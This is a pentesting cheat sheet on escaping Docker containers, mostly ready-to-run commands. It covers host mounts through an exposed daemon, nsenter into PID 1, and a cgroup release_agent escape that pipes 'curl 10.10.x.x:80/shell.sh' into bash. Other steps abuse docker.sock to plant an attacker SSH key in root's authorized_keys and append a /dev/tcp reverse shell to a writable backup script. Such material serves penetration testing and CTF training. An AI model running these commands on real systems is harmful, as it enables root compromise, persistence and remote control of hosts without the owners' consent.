docker container escape

Theory

Docker is an open-source containerization platform used for developing, deploying, and managing applications in lightweight virtualized environments called containers.

Practical (Exploitation)

Checking if we're in Container

1. List running processes

ps aux

1. Look for docker.env file

cd / && ls -lah

1. Those pesky cgroups

Navigating to “/proc/1” and then catting the “cgroups” file (cat cgroup).

Use following code to Verify you are in Docker

if [ -f /.dockerenv ]; then
 echo "I'm inside matrix ;(";
else
 echo "I'm living in real world!";
fi

Docker Escaping Techniques

1. Escape via Exposed Docker Daemon

Run the following cmd

If we’re in bash

docker run -v /:/mnt --rm -it bash chroot /mnt sh

If we’re in alpine

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

You can see the images repo

docker images
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

2. Shared Namespaces

By using ps aux you can view the process with processID see pid 1 is running root it is the first one that executed when the system is booted.

Exploiting it with nsenter

nsenter --target 1 --mount sh

3. Escape By Mounting File System

lsblk
mount /dev/sda2 /mnt
cd /mnt/root

4. Misconfigured Privileges

list out all the capabilities

capsh --print
capsh --print | grep sys_admin

On attacker VM:

First make a shell.sh and set python server and set listner.

On target machine:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.x.x:80/shell.sh | bash' >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

5. Exploitation of docker.sock in /var/run or /run if you're ROOT

Check /var/run dir for docker.sock file, if it’s there and you’re root then you can exploit it. First see that you can use curl cmd, if not then wget static curl from your system for static curl see the arch of target machine and get the static curl from Resource

STEP1: Listing the images of the container of the host

./curl -s --unix-socket /var/run/docker.sock http://localhost/images/json

STEP2: Now generate id_rsa in your machine

ssh-keygen -t rsa
cat key.pub

STEP3: Creating a new docker container with image ID

./curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"c3:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo ssh-rsa AAAA..............xfoS+Yb2cW4y9cKcBWpVIiNMEtMX7sIB/0cKl8W/mY4u1UeRzWOoIIew6hqlaWCW6WKeSiCrNzEEj.........................P0/BMcKBS2pzqct2rTQ/LfFFM= root@kali >> /var/tmp/root/.ssh/authorized_keys"]}'

Now you’ll see you created a docker and get the id. eg: {“Id”:”c19a25c6cc7245030bf9741d300f632cc7f1e5f12adad238edce23d387ba00c2”,”Warnings”:[]}

STEP4: Now we gonna use the id and start the docker

./curl -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/c19a25c6cc7245030bf9741d300f632cc7f1e5f12adad238edce23d387ba00c2/start

STEP5: Login SSH via your private key as user root and now you’re root

ssh -i key root@10.10.x.x

6. Debugfs

### debugfs (Interactive File System Debugger)
debugfs /dev/sda1

3. Writeable Backup Scripts

If we can find any writable backup scripts in a docker instance then we can add our own reverse shell into it.

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.17.6.228/4444 0>&1'" >> backup.sh  

Run a netcat listener

nc -nlvp 4444

REFERENCES

• https://k4sth4.github.io/Docker-Escape/

• https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation

• https://youtu.be/_dhONyAk4es

• https://book.hacktricks.xyz/network-services-pentesting/2375-pentesting-docker

• https://blog.ropnop.com/docker-for-pentesters/

• https://l3m0n.gitbook.io/pen-testing-book/container-pentesting/docker-pentesting